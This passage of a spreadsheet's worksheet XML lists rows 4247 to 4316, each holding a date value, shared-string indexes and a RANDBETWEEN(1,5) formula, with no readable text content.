      <c r="E4247" t="s">
        <v>4075</v>
      </c>
      <c r="F4247">
        <f t="shared" ca="1" si="66"/>
        <v>4</v>
      </c>
    </row>
    <row r="4248" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4248" s="1">
        <v>43479.985277777778</v>
      </c>
      <c r="B4248" t="s">
        <v>13</v>
      </c>
      <c r="C4248" t="s">
        <v>10</v>
      </c>
      <c r="D4248" t="s">
        <v>6</v>
      </c>
      <c r="F4248">
        <f t="shared" ca="1" si="66"/>
        <v>1</v>
      </c>
    </row>
    <row r="4249" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4249" s="1">
        <v>43479.96979166667</v>
      </c>
      <c r="B4249" t="s">
        <v>5</v>
      </c>
      <c r="C4249" t="s">
        <v>140</v>
      </c>
      <c r="D4249" t="s">
        <v>141</v>
      </c>
      <c r="E4249" t="s">
        <v>4076</v>
      </c>
      <c r="F4249">
        <f t="shared" ca="1" si="66"/>
        <v>2</v>
      </c>
    </row>
    <row r="4250" spans="1:6" ht="195" x14ac:dyDescent="0.25">
      <c r="A4250" s="1">
        <v>43479.966967592591</v>
      </c>
      <c r="B4250" t="s">
        <v>19</v>
      </c>
      <c r="C4250" t="s">
        <v>314</v>
      </c>
      <c r="E4250" s="2" t="s">
        <v>4077</v>
      </c>
      <c r="F4250">
        <f t="shared" ca="1" si="66"/>
        <v>3</v>
      </c>
    </row>
    <row r="4251" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4251" s="1">
        <v>43479.956643518519</v>
      </c>
      <c r="B4251" t="s">
        <v>5</v>
      </c>
      <c r="C4251" t="s">
        <v>10</v>
      </c>
      <c r="D4251" t="s">
        <v>14</v>
      </c>
      <c r="E4251" t="s">
        <v>4078</v>
      </c>
      <c r="F4251">
        <f t="shared" ca="1" si="66"/>
        <v>4</v>
      </c>
    </row>
    <row r="4252" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4252" s="1">
        <v>43479.890289351853</v>
      </c>
      <c r="B4252" t="s">
        <v>5</v>
      </c>
      <c r="C4252" t="s">
        <v>253</v>
      </c>
      <c r="E4252" t="s">
        <v>4079</v>
      </c>
      <c r="F4252">
        <f t="shared" ca="1" si="66"/>
        <v>2</v>
      </c>
    </row>
    <row r="4253" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4253" s="1">
        <v>43479.884444444448</v>
      </c>
      <c r="B4253" t="s">
        <v>19</v>
      </c>
      <c r="C4253" t="s">
        <v>253</v>
      </c>
      <c r="E4253" t="s">
        <v>4080</v>
      </c>
      <c r="F4253">
        <f t="shared" ca="1" si="66"/>
        <v>4</v>
      </c>
    </row>
    <row r="4254" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A4254" s="1">
        <v>43479.879386574074</v>
      </c>
      <c r="B4254" t="s">
        <v>5</v>
      </c>
      <c r="C4254" t="s">
        <v>10</v>
      </c>
      <c r="D4254" t="s">
        <v>107</v>
      </c>
      <c r="E4254" s="2" t="s">
        <v>4081</v>
      </c>
      <c r="F4254">
        <f t="shared" ca="1" si="66"/>
        <v>5</v>
      </c>
    </row>
    <row r="4255" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4255" s="1">
        <v>43479.878761574073</v>
      </c>
      <c r="B4255" t="s">
        <v>5</v>
      </c>
      <c r="C4255" t="s">
        <v>410</v>
      </c>
      <c r="E4255" t="s">
        <v>4082</v>
      </c>
      <c r="F4255">
        <f t="shared" ca="1" si="66"/>
        <v>5</v>
      </c>
    </row>
    <row r="4256" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4256" s="1">
        <v>43479.87394675926</v>
      </c>
      <c r="B4256" t="s">
        <v>5</v>
      </c>
      <c r="C4256" t="s">
        <v>29</v>
      </c>
      <c r="E4256" t="s">
        <v>3871</v>
      </c>
      <c r="F4256">
        <f t="shared" ca="1" si="66"/>
        <v>4</v>
      </c>
    </row>
    <row r="4257" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A4257" s="1">
        <v>43479.841863425929</v>
      </c>
      <c r="B4257" t="s">
        <v>1305</v>
      </c>
      <c r="C4257" t="s">
        <v>10</v>
      </c>
      <c r="D4257" t="s">
        <v>80</v>
      </c>
      <c r="E4257" s="2" t="s">
        <v>4083</v>
      </c>
      <c r="F4257">
        <f t="shared" ca="1" si="66"/>
        <v>2</v>
      </c>
    </row>
    <row r="4258" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4258" s="1">
        <v>43479.83253472222</v>
      </c>
      <c r="B4258" t="s">
        <v>13</v>
      </c>
      <c r="C4258" t="s">
        <v>139</v>
      </c>
      <c r="E4258" t="s">
        <v>4084</v>
      </c>
      <c r="F4258">
        <f t="shared" ca="1" si="66"/>
        <v>2</v>
      </c>
    </row>
    <row r="4259" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A4259" s="1">
        <v>43479.756979166668</v>
      </c>
      <c r="B4259" t="s">
        <v>5</v>
      </c>
      <c r="C4259" t="s">
        <v>220</v>
      </c>
      <c r="E4259" s="2" t="s">
        <v>4085</v>
      </c>
      <c r="F4259">
        <f t="shared" ca="1" si="66"/>
        <v>2</v>
      </c>
    </row>
    <row r="4260" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4260" s="1">
        <v>43479.747719907406</v>
      </c>
      <c r="B4260" t="s">
        <v>5</v>
      </c>
      <c r="C4260" t="s">
        <v>154</v>
      </c>
      <c r="D4260" t="s">
        <v>602</v>
      </c>
      <c r="E4260" t="s">
        <v>3914</v>
      </c>
      <c r="F4260">
        <f t="shared" ca="1" si="66"/>
        <v>2</v>
      </c>
    </row>
    <row r="4261" spans="1:6" ht="195" x14ac:dyDescent="0.25">
      <c r="A4261" s="1">
        <v>43479.747187499997</v>
      </c>
      <c r="B4261" t="s">
        <v>13</v>
      </c>
      <c r="C4261" t="s">
        <v>10</v>
      </c>
      <c r="D4261" t="s">
        <v>56</v>
      </c>
      <c r="E4261" s="2" t="s">
        <v>4086</v>
      </c>
      <c r="F4261">
        <f t="shared" ca="1" si="66"/>
        <v>3</v>
      </c>
    </row>
    <row r="4262" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A4262" s="1">
        <v>43479.735682870371</v>
      </c>
      <c r="B4262" t="s">
        <v>5</v>
      </c>
      <c r="C4262" t="s">
        <v>10</v>
      </c>
      <c r="D4262" t="s">
        <v>107</v>
      </c>
      <c r="E4262" s="2" t="s">
        <v>4087</v>
      </c>
      <c r="F4262">
        <f t="shared" ca="1" si="66"/>
        <v>1</v>
      </c>
    </row>
    <row r="4263" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4263" s="1">
        <v>43479.726458333331</v>
      </c>
      <c r="B4263" t="s">
        <v>1305</v>
      </c>
      <c r="C4263" t="s">
        <v>10</v>
      </c>
      <c r="D4263" t="s">
        <v>36</v>
      </c>
      <c r="E4263" t="s">
        <v>4088</v>
      </c>
      <c r="F4263">
        <f t="shared" ca="1" si="66"/>
        <v>4</v>
      </c>
    </row>
    <row r="4264" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4264" s="1">
        <v>43479.694143518522</v>
      </c>
      <c r="B4264" t="s">
        <v>19</v>
      </c>
      <c r="C4264" t="s">
        <v>124</v>
      </c>
      <c r="E4264" t="s">
        <v>4089</v>
      </c>
      <c r="F4264">
        <f t="shared" ca="1" si="66"/>
        <v>5</v>
      </c>
    </row>
    <row r="4265" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4265" s="1">
        <v>43479.676099537035</v>
      </c>
      <c r="B4265" t="s">
        <v>5</v>
      </c>
      <c r="C4265" t="s">
        <v>6</v>
      </c>
      <c r="D4265" t="s">
        <v>114</v>
      </c>
      <c r="E4265" t="s">
        <v>4090</v>
      </c>
      <c r="F4265">
        <f t="shared" ca="1" si="66"/>
        <v>2</v>
      </c>
    </row>
    <row r="4266" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4266" s="1">
        <v>43479.671747685185</v>
      </c>
      <c r="B4266" t="s">
        <v>13</v>
      </c>
      <c r="C4266" t="s">
        <v>10</v>
      </c>
      <c r="D4266" t="s">
        <v>20</v>
      </c>
      <c r="E4266" t="s">
        <v>4091</v>
      </c>
      <c r="F4266">
        <f t="shared" ca="1" si="66"/>
        <v>5</v>
      </c>
    </row>
    <row r="4267" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4267" s="1">
        <v>43479.668449074074</v>
      </c>
      <c r="B4267" t="s">
        <v>19</v>
      </c>
      <c r="C4267" t="s">
        <v>10</v>
      </c>
      <c r="D4267" t="s">
        <v>178</v>
      </c>
      <c r="E4267" t="s">
        <v>4092</v>
      </c>
      <c r="F4267">
        <f t="shared" ca="1" si="66"/>
        <v>4</v>
      </c>
    </row>
    <row r="4268" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4268" s="1">
        <v>43479.66574074074</v>
      </c>
      <c r="B4268" t="s">
        <v>19</v>
      </c>
      <c r="C4268" t="s">
        <v>10</v>
      </c>
      <c r="D4268" t="s">
        <v>86</v>
      </c>
      <c r="E4268" t="s">
        <v>4093</v>
      </c>
      <c r="F4268">
        <f t="shared" ca="1" si="66"/>
        <v>2</v>
      </c>
    </row>
    <row r="4269" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4269" s="1">
        <v>43479.665243055555</v>
      </c>
      <c r="B4269" t="s">
        <v>5</v>
      </c>
      <c r="C4269" t="s">
        <v>10</v>
      </c>
      <c r="D4269" t="s">
        <v>17</v>
      </c>
      <c r="E4269" t="s">
        <v>4094</v>
      </c>
      <c r="F4269">
        <f t="shared" ca="1" si="66"/>
        <v>5</v>
      </c>
    </row>
    <row r="4270" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4270" s="1">
        <v>43479.654664351852</v>
      </c>
      <c r="B4270" t="s">
        <v>5</v>
      </c>
      <c r="C4270" t="s">
        <v>60</v>
      </c>
      <c r="E4270" t="s">
        <v>4095</v>
      </c>
      <c r="F4270">
        <f t="shared" ca="1" si="66"/>
        <v>5</v>
      </c>
    </row>
    <row r="4271" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4271" s="1">
        <v>43479.651631944442</v>
      </c>
      <c r="B4271" t="s">
        <v>19</v>
      </c>
      <c r="C4271" t="s">
        <v>10</v>
      </c>
      <c r="D4271" t="s">
        <v>6</v>
      </c>
      <c r="E4271" t="s">
        <v>4096</v>
      </c>
      <c r="F4271">
        <f t="shared" ca="1" si="66"/>
        <v>5</v>
      </c>
    </row>
    <row r="4272" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4272" s="1">
        <v>43479.639189814814</v>
      </c>
      <c r="B4272" t="s">
        <v>19</v>
      </c>
      <c r="C4272" t="s">
        <v>10</v>
      </c>
      <c r="D4272" t="s">
        <v>52</v>
      </c>
      <c r="E4272" t="s">
        <v>4097</v>
      </c>
      <c r="F4272">
        <f t="shared" ca="1" si="66"/>
        <v>3</v>
      </c>
    </row>
    <row r="4273" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4273" s="1">
        <v>43479.636817129627</v>
      </c>
      <c r="B4273" t="s">
        <v>5</v>
      </c>
      <c r="C4273" t="s">
        <v>60</v>
      </c>
      <c r="E4273" t="s">
        <v>4098</v>
      </c>
      <c r="F4273">
        <f t="shared" ca="1" si="66"/>
        <v>3</v>
      </c>
    </row>
    <row r="4274" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4274" s="1">
        <v>43479.633645833332</v>
      </c>
      <c r="B4274" t="s">
        <v>19</v>
      </c>
      <c r="C4274" t="s">
        <v>10</v>
      </c>
      <c r="D4274" t="s">
        <v>251</v>
      </c>
      <c r="E4274" t="s">
        <v>4099</v>
      </c>
      <c r="F4274">
        <f t="shared" ca="1" si="66"/>
        <v>2</v>
      </c>
    </row>
    <row r="4275" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4275" s="1">
        <v>43479.615891203706</v>
      </c>
      <c r="B4275" t="s">
        <v>13</v>
      </c>
      <c r="C4275" t="s">
        <v>10</v>
      </c>
      <c r="D4275" t="s">
        <v>6</v>
      </c>
      <c r="E4275" t="s">
        <v>4100</v>
      </c>
      <c r="F4275">
        <f t="shared" ca="1" si="66"/>
        <v>5</v>
      </c>
    </row>
    <row r="4276" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4276" s="1">
        <v>43479.611203703702</v>
      </c>
      <c r="B4276" t="s">
        <v>5</v>
      </c>
      <c r="C4276" t="s">
        <v>10</v>
      </c>
      <c r="D4276" t="s">
        <v>46</v>
      </c>
      <c r="E4276" t="s">
        <v>4101</v>
      </c>
      <c r="F4276">
        <f t="shared" ca="1" si="66"/>
        <v>3</v>
      </c>
    </row>
    <row r="4277" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4277" s="1">
        <v>43479.579733796294</v>
      </c>
      <c r="B4277" t="s">
        <v>5</v>
      </c>
      <c r="C4277" t="s">
        <v>6</v>
      </c>
      <c r="D4277" t="s">
        <v>25</v>
      </c>
      <c r="E4277" t="s">
        <v>4102</v>
      </c>
      <c r="F4277">
        <f t="shared" ca="1" si="66"/>
        <v>4</v>
      </c>
    </row>
    <row r="4278" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A4278" s="1">
        <v>43479.577175925922</v>
      </c>
      <c r="B4278" t="s">
        <v>13</v>
      </c>
      <c r="C4278" t="s">
        <v>10</v>
      </c>
      <c r="D4278" t="s">
        <v>23</v>
      </c>
      <c r="E4278" s="2" t="s">
        <v>4103</v>
      </c>
      <c r="F4278">
        <f t="shared" ca="1" si="66"/>
        <v>1</v>
      </c>
    </row>
    <row r="4279" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4279" s="1">
        <v>43479.552314814813</v>
      </c>
      <c r="B4279" t="s">
        <v>13</v>
      </c>
      <c r="C4279" t="s">
        <v>10</v>
      </c>
      <c r="D4279" t="s">
        <v>107</v>
      </c>
      <c r="E4279" t="s">
        <v>4104</v>
      </c>
      <c r="F4279">
        <f t="shared" ca="1" si="66"/>
        <v>1</v>
      </c>
    </row>
    <row r="4280" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4280" s="1">
        <v>43479.54792824074</v>
      </c>
      <c r="B4280" t="s">
        <v>19</v>
      </c>
      <c r="C4280" t="s">
        <v>10</v>
      </c>
      <c r="D4280" t="s">
        <v>46</v>
      </c>
      <c r="E4280" t="s">
        <v>4105</v>
      </c>
      <c r="F4280">
        <f t="shared" ca="1" si="66"/>
        <v>3</v>
      </c>
    </row>
    <row r="4281" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4281" s="1">
        <v>43479.538773148146</v>
      </c>
      <c r="B4281" t="s">
        <v>13</v>
      </c>
      <c r="C4281" t="s">
        <v>10</v>
      </c>
      <c r="D4281" t="s">
        <v>192</v>
      </c>
      <c r="E4281" t="s">
        <v>4106</v>
      </c>
      <c r="F4281">
        <f t="shared" ca="1" si="66"/>
        <v>2</v>
      </c>
    </row>
    <row r="4282" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4282" s="1">
        <v>43479.536261574074</v>
      </c>
      <c r="B4282" t="s">
        <v>13</v>
      </c>
      <c r="C4282" t="s">
        <v>10</v>
      </c>
      <c r="D4282" t="s">
        <v>158</v>
      </c>
      <c r="E4282" t="s">
        <v>4107</v>
      </c>
      <c r="F4282">
        <f t="shared" ca="1" si="66"/>
        <v>3</v>
      </c>
    </row>
    <row r="4283" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A4283" s="1">
        <v>43479.506863425922</v>
      </c>
      <c r="B4283" t="s">
        <v>13</v>
      </c>
      <c r="C4283" t="s">
        <v>10</v>
      </c>
      <c r="D4283" t="s">
        <v>86</v>
      </c>
      <c r="E4283" s="2" t="s">
        <v>4108</v>
      </c>
      <c r="F4283">
        <f t="shared" ca="1" si="66"/>
        <v>4</v>
      </c>
    </row>
    <row r="4284" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4284" s="1">
        <v>43479.490335648145</v>
      </c>
      <c r="B4284" t="s">
        <v>1305</v>
      </c>
      <c r="C4284" t="s">
        <v>10</v>
      </c>
      <c r="D4284" t="s">
        <v>89</v>
      </c>
      <c r="E4284" t="s">
        <v>4109</v>
      </c>
      <c r="F4284">
        <f t="shared" ca="1" si="66"/>
        <v>5</v>
      </c>
    </row>
    <row r="4285" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4285" s="1">
        <v>43479.482615740744</v>
      </c>
      <c r="B4285" t="s">
        <v>19</v>
      </c>
      <c r="C4285" t="s">
        <v>10</v>
      </c>
      <c r="D4285" t="s">
        <v>86</v>
      </c>
      <c r="E4285" t="s">
        <v>4110</v>
      </c>
      <c r="F4285">
        <f t="shared" ca="1" si="66"/>
        <v>4</v>
      </c>
    </row>
    <row r="4286" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4286" s="1">
        <v>43479.475497685184</v>
      </c>
      <c r="B4286" t="s">
        <v>19</v>
      </c>
      <c r="C4286" t="s">
        <v>10</v>
      </c>
      <c r="D4286" t="s">
        <v>20</v>
      </c>
      <c r="E4286" t="s">
        <v>4111</v>
      </c>
      <c r="F4286">
        <f t="shared" ca="1" si="66"/>
        <v>5</v>
      </c>
    </row>
    <row r="4287" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4287" s="1">
        <v>43479.451180555552</v>
      </c>
      <c r="B4287" t="s">
        <v>19</v>
      </c>
      <c r="C4287" t="s">
        <v>10</v>
      </c>
      <c r="D4287" t="s">
        <v>163</v>
      </c>
      <c r="E4287" t="s">
        <v>4112</v>
      </c>
      <c r="F4287">
        <f t="shared" ca="1" si="66"/>
        <v>1</v>
      </c>
    </row>
    <row r="4288" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A4288" s="1">
        <v>43479.434432870374</v>
      </c>
      <c r="B4288" t="s">
        <v>19</v>
      </c>
      <c r="C4288" t="s">
        <v>10</v>
      </c>
      <c r="D4288" t="s">
        <v>89</v>
      </c>
      <c r="E4288" s="2" t="s">
        <v>4113</v>
      </c>
      <c r="F4288">
        <f t="shared" ca="1" si="66"/>
        <v>3</v>
      </c>
    </row>
    <row r="4289" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4289" s="1">
        <v>43479.43378472222</v>
      </c>
      <c r="B4289" t="s">
        <v>19</v>
      </c>
      <c r="C4289" t="s">
        <v>10</v>
      </c>
      <c r="D4289" t="s">
        <v>271</v>
      </c>
      <c r="E4289" t="s">
        <v>4114</v>
      </c>
      <c r="F4289">
        <f t="shared" ca="1" si="66"/>
        <v>5</v>
      </c>
    </row>
    <row r="4290" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4290" s="1">
        <v>43479.43240740741</v>
      </c>
      <c r="B4290" t="s">
        <v>5</v>
      </c>
      <c r="C4290" t="s">
        <v>48</v>
      </c>
      <c r="E4290" t="s">
        <v>4115</v>
      </c>
      <c r="F4290">
        <f t="shared" ref="F4290:F4353" ca="1" si="67">RANDBETWEEN(1,5)</f>
        <v>4</v>
      </c>
    </row>
    <row r="4291" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4291" s="1">
        <v>43479.419120370374</v>
      </c>
      <c r="B4291" t="s">
        <v>1305</v>
      </c>
      <c r="C4291" t="s">
        <v>10</v>
      </c>
      <c r="D4291" t="s">
        <v>11</v>
      </c>
      <c r="E4291" t="s">
        <v>4116</v>
      </c>
      <c r="F4291">
        <f t="shared" ca="1" si="67"/>
        <v>3</v>
      </c>
    </row>
    <row r="4292" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4292" s="1">
        <v>43479.419004629628</v>
      </c>
      <c r="B4292" t="s">
        <v>5</v>
      </c>
      <c r="C4292" t="s">
        <v>10</v>
      </c>
      <c r="D4292" t="s">
        <v>86</v>
      </c>
      <c r="E4292" t="s">
        <v>4117</v>
      </c>
      <c r="F4292">
        <f t="shared" ca="1" si="67"/>
        <v>3</v>
      </c>
    </row>
    <row r="4293" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4293" s="1">
        <v>43479.408564814818</v>
      </c>
      <c r="B4293" t="s">
        <v>19</v>
      </c>
      <c r="C4293" t="s">
        <v>10</v>
      </c>
      <c r="D4293" t="s">
        <v>20</v>
      </c>
      <c r="E4293" t="s">
        <v>4118</v>
      </c>
      <c r="F4293">
        <f t="shared" ca="1" si="67"/>
        <v>4</v>
      </c>
    </row>
    <row r="4294" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4294" s="1">
        <v>43479.405497685184</v>
      </c>
      <c r="B4294" t="s">
        <v>13</v>
      </c>
      <c r="C4294" t="s">
        <v>10</v>
      </c>
      <c r="D4294" t="s">
        <v>86</v>
      </c>
      <c r="F4294">
        <f t="shared" ca="1" si="67"/>
        <v>5</v>
      </c>
    </row>
    <row r="4295" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4295" s="1">
        <v>43479.398634259262</v>
      </c>
      <c r="B4295" t="s">
        <v>19</v>
      </c>
      <c r="C4295" t="s">
        <v>10</v>
      </c>
      <c r="D4295" t="s">
        <v>86</v>
      </c>
      <c r="E4295" t="s">
        <v>4119</v>
      </c>
      <c r="F4295">
        <f t="shared" ca="1" si="67"/>
        <v>4</v>
      </c>
    </row>
    <row r="4296" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4296" s="1">
        <v>43479.396168981482</v>
      </c>
      <c r="B4296" t="s">
        <v>5</v>
      </c>
      <c r="C4296" t="s">
        <v>48</v>
      </c>
      <c r="E4296" t="s">
        <v>4120</v>
      </c>
      <c r="F4296">
        <f t="shared" ca="1" si="67"/>
        <v>1</v>
      </c>
    </row>
    <row r="4297" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4297" s="1">
        <v>43479.393391203703</v>
      </c>
      <c r="B4297" t="s">
        <v>19</v>
      </c>
      <c r="C4297" t="s">
        <v>10</v>
      </c>
      <c r="D4297" t="s">
        <v>112</v>
      </c>
      <c r="E4297" t="s">
        <v>4121</v>
      </c>
      <c r="F4297">
        <f t="shared" ca="1" si="67"/>
        <v>3</v>
      </c>
    </row>
    <row r="4298" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A4298" s="1">
        <v>43479.388969907406</v>
      </c>
      <c r="B4298" t="s">
        <v>5</v>
      </c>
      <c r="C4298" t="s">
        <v>10</v>
      </c>
      <c r="D4298" t="s">
        <v>36</v>
      </c>
      <c r="E4298" s="2" t="s">
        <v>4122</v>
      </c>
      <c r="F4298">
        <f t="shared" ca="1" si="67"/>
        <v>4</v>
      </c>
    </row>
    <row r="4299" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A4299" s="1">
        <v>43479.384988425925</v>
      </c>
      <c r="B4299" t="s">
        <v>1305</v>
      </c>
      <c r="C4299" t="s">
        <v>48</v>
      </c>
      <c r="E4299" s="2" t="s">
        <v>4123</v>
      </c>
      <c r="F4299">
        <f t="shared" ca="1" si="67"/>
        <v>2</v>
      </c>
    </row>
    <row r="4300" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A4300" s="1">
        <v>43479.385000000002</v>
      </c>
      <c r="B4300" t="s">
        <v>1305</v>
      </c>
      <c r="C4300" t="s">
        <v>48</v>
      </c>
      <c r="E4300" s="2" t="s">
        <v>4123</v>
      </c>
      <c r="F4300">
        <f t="shared" ca="1" si="67"/>
        <v>4</v>
      </c>
    </row>
    <row r="4301" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A4301" s="1">
        <v>43479.363043981481</v>
      </c>
      <c r="B4301" t="s">
        <v>19</v>
      </c>
      <c r="C4301" t="s">
        <v>71</v>
      </c>
      <c r="E4301" s="2" t="s">
        <v>4124</v>
      </c>
      <c r="F4301">
        <f t="shared" ca="1" si="67"/>
        <v>5</v>
      </c>
    </row>
    <row r="4302" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4302" s="1">
        <v>43479.358831018515</v>
      </c>
      <c r="B4302" t="s">
        <v>13</v>
      </c>
      <c r="C4302" t="s">
        <v>60</v>
      </c>
      <c r="E4302" t="s">
        <v>4125</v>
      </c>
      <c r="F4302">
        <f t="shared" ca="1" si="67"/>
        <v>4</v>
      </c>
    </row>
    <row r="4303" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4303" s="1">
        <v>43479.358807870369</v>
      </c>
      <c r="B4303" t="s">
        <v>13</v>
      </c>
      <c r="C4303" t="s">
        <v>60</v>
      </c>
      <c r="E4303" t="s">
        <v>4125</v>
      </c>
      <c r="F4303">
        <f t="shared" ca="1" si="67"/>
        <v>5</v>
      </c>
    </row>
    <row r="4304" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4304" s="1">
        <v>43479.306250000001</v>
      </c>
      <c r="B4304" t="s">
        <v>5</v>
      </c>
      <c r="C4304" t="s">
        <v>10</v>
      </c>
      <c r="D4304" t="s">
        <v>178</v>
      </c>
      <c r="E4304" t="s">
        <v>4126</v>
      </c>
      <c r="F4304">
        <f t="shared" ca="1" si="67"/>
        <v>2</v>
      </c>
    </row>
    <row r="4305" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A4305" s="1">
        <v>43479.286782407406</v>
      </c>
      <c r="B4305" t="s">
        <v>1305</v>
      </c>
      <c r="C4305" t="s">
        <v>173</v>
      </c>
      <c r="E4305" s="2" t="s">
        <v>4127</v>
      </c>
      <c r="F4305">
        <f t="shared" ca="1" si="67"/>
        <v>5</v>
      </c>
    </row>
    <row r="4306" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4306" s="1">
        <v>43479.283275462964</v>
      </c>
      <c r="B4306" t="s">
        <v>5</v>
      </c>
      <c r="C4306" t="s">
        <v>48</v>
      </c>
      <c r="E4306" t="s">
        <v>4128</v>
      </c>
      <c r="F4306">
        <f t="shared" ca="1" si="67"/>
        <v>1</v>
      </c>
    </row>
    <row r="4307" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4307" s="1">
        <v>43479.279583333337</v>
      </c>
      <c r="B4307" t="s">
        <v>19</v>
      </c>
      <c r="C4307" t="s">
        <v>776</v>
      </c>
      <c r="E4307" t="s">
        <v>4129</v>
      </c>
      <c r="F4307">
        <f t="shared" ca="1" si="67"/>
        <v>3</v>
      </c>
    </row>
    <row r="4308" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A4308" s="1">
        <v>43479.276134259257</v>
      </c>
      <c r="B4308" t="s">
        <v>5</v>
      </c>
      <c r="C4308" t="s">
        <v>48</v>
      </c>
      <c r="E4308" s="2" t="s">
        <v>4130</v>
      </c>
      <c r="F4308">
        <f t="shared" ca="1" si="67"/>
        <v>5</v>
      </c>
    </row>
    <row r="4309" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4309" s="1">
        <v>43479.268854166665</v>
      </c>
      <c r="B4309" t="s">
        <v>1305</v>
      </c>
      <c r="C4309" t="s">
        <v>48</v>
      </c>
      <c r="E4309" t="s">
        <v>4131</v>
      </c>
      <c r="F4309">
        <f t="shared" ca="1" si="67"/>
        <v>5</v>
      </c>
    </row>
    <row r="4310" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A4310" s="1">
        <v>43479.230324074073</v>
      </c>
      <c r="B4310" t="s">
        <v>5</v>
      </c>
      <c r="C4310" t="s">
        <v>318</v>
      </c>
      <c r="E4310" s="2" t="s">
        <v>4132</v>
      </c>
      <c r="F4310">
        <f t="shared" ca="1" si="67"/>
        <v>1</v>
      </c>
    </row>
    <row r="4311" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A4311" s="1">
        <v>43479.222349537034</v>
      </c>
      <c r="B4311" t="s">
        <v>19</v>
      </c>
      <c r="C4311" t="s">
        <v>197</v>
      </c>
      <c r="E4311" s="2" t="s">
        <v>4133</v>
      </c>
      <c r="F4311">
        <f t="shared" ca="1" si="67"/>
        <v>3</v>
      </c>
    </row>
    <row r="4312" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A4312" s="1">
        <v>43479.21466435185</v>
      </c>
      <c r="B4312" t="s">
        <v>1305</v>
      </c>
      <c r="C4312" t="s">
        <v>73</v>
      </c>
      <c r="E4312" s="2" t="s">
        <v>4134</v>
      </c>
      <c r="F4312">
        <f t="shared" ca="1" si="67"/>
        <v>3</v>
      </c>
    </row>
    <row r="4313" spans="1:6" ht="195" x14ac:dyDescent="0.25">
      <c r="A4313" s="1">
        <v>43479.19630787037</v>
      </c>
      <c r="B4313" t="s">
        <v>5</v>
      </c>
      <c r="C4313" t="s">
        <v>10</v>
      </c>
      <c r="D4313" t="s">
        <v>6</v>
      </c>
      <c r="E4313" s="2" t="s">
        <v>4135</v>
      </c>
      <c r="F4313">
        <f t="shared" ca="1" si="67"/>
        <v>5</v>
      </c>
    </row>
    <row r="4314" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4314" s="1">
        <v>43479.18855324074</v>
      </c>
      <c r="B4314" t="s">
        <v>19</v>
      </c>
      <c r="C4314" t="s">
        <v>301</v>
      </c>
      <c r="E4314" t="s">
        <v>4136</v>
      </c>
      <c r="F4314">
        <f t="shared" ca="1" si="67"/>
        <v>5</v>
      </c>
    </row>
    <row r="4315" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4315" s="1">
        <v>43479.172534722224</v>
      </c>
      <c r="B4315" t="s">
        <v>19</v>
      </c>
      <c r="C4315" t="s">
        <v>333</v>
      </c>
      <c r="E4315" t="s">
        <v>4137</v>
      </c>
      <c r="F4315">
        <f t="shared" ca="1" si="67"/>
        <v>3</v>
      </c>
    </row>
    <row r="4316" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4316" s="1">
        <v>43479.162222222221</v>
      </c>
      <c r="B4316" t="s">
        <v>19</v>
      </c>
